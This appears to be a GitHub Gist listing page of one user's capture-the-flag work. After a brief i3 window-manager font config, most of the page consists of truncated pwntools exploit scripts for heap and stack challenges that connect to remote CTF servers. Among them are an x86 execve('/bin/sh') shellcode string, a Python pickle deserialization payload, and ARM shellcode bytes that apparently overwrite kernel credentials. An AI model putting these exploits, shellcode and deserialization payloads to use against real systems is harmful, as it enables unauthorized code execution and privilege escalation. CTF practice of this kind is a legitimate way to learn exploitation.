cubarco / config
Created March 5, 2016 09:01
My i3 configs.
#.......
# font
#.......
#font -*-cure-medium-*-*-*-11-*-*-*-*-*-*-*
font pango:snap, Tamsyn, WenQuanYi Bitmap Song, FontAwesome, Unifont 8
#..........
# windows
#..........
#!/usr/bin/env python
# coding=utf8
from pwn import p64, u64, process, ELF
elf = ELF('/lib64/libc.so.6')
# elf = ELF('./libc-2.19.so')
p = process('./note3')
free_got = 0x602018
#!/usr/bin/env python
# coding=utf8
from pwn import process, ELF, p64
from struct import unpack
# elf = ELF('./libc-2.19.so')
elf = ELF('/lib64/libc.so.6')
p = process('./note2')
#!/usr/bin/env python
# coding=utf8
from pwn import p64, ELF, process, remote
from struct import unpack
from time import sleep
# p = process('./note1')
p = remote('115.28.27.103', 9001)
elf = ELF('./libc-2.19.so')
#!/usr/bin/env python
# coding=utf8
from pwn import p64, remote
p = remote('115.28.27.103', 22222)
flag_addr = 0x6010c0
p.sendline('ZCTF{' + '\x01'*29 + '\x00'*262 + p64(flag_addr+5))
#!/usr/bin/env python
# coding=utf8
from pwn import p64, remote
from time import sleep
from struct import unpack
main_without_push_addr = 0x4004ee
p = remote('136.243.194.41', 666)
#!/usr/bin/env python
# coding=utf8
import urllib2
import pickle
class Payload(object):
def __reduce__(self):
comm = "sys.stderr.write(__import__('__main__').flag.flag)"
#!/usr/bin/env python
# coding=utf8
from pwn import p64, process, ELF
from time import sleep
EXECUTABLE = '/home/unexploitable/unexploitable'
elf = ELF(EXECUTABLE)
cubarco / pwnable-rookiss-note.py
Last active January 23, 2016 16:07
This may take more than one minute, and may fail at the end. Keep trying, you'll get the shell XD
#!/usr/bin/env python
# coding=utf8
from pwn import p32, process, remote
# p = process('./note')
p = remote('0', 9019)
shellcode = '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x90'
print '[*] Receiving welcome message...'
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
char cred[] = "\x04\xe0\x2d\xe5\x00\x00\xa0\xe3\x40\x30\x9f\xe5\x33\xff\x2f\xe1\x04\x00\x2d\xe5\x01\x10\x41\xe0\x04\x00\x80\xe2\x04\x10\x80\xe4\x04\x10\x80\xe4\x04\x10\x80\xe4\x04\x10\x80\xe4\x04\x10\x80\xe4\x04\x10\x80\xe4\x04\x10\x80\xe4\x04\x10\x80\xe4\x04\x00\x9d\xe4\x0c\x30\x9f\xe5\x33\xff\x2f\xe1\x04\xe0\x9d\xe4\x1e\xff\x2f\xe1\x4c\xf4\x03\x80\x6c\xf5\x03\x80";
char waa[] = "\x01\x30\xd0\xe4\x01\x30\xc1\xe4\x01\x20\x52\xe2\xfb\xff\xff\xaa\x1e\xff\x2f\xe1";
char addr1[] = "\xfe\xca\xf5\x83";
char addr2[] = "\xee\xbe\xf6\x83";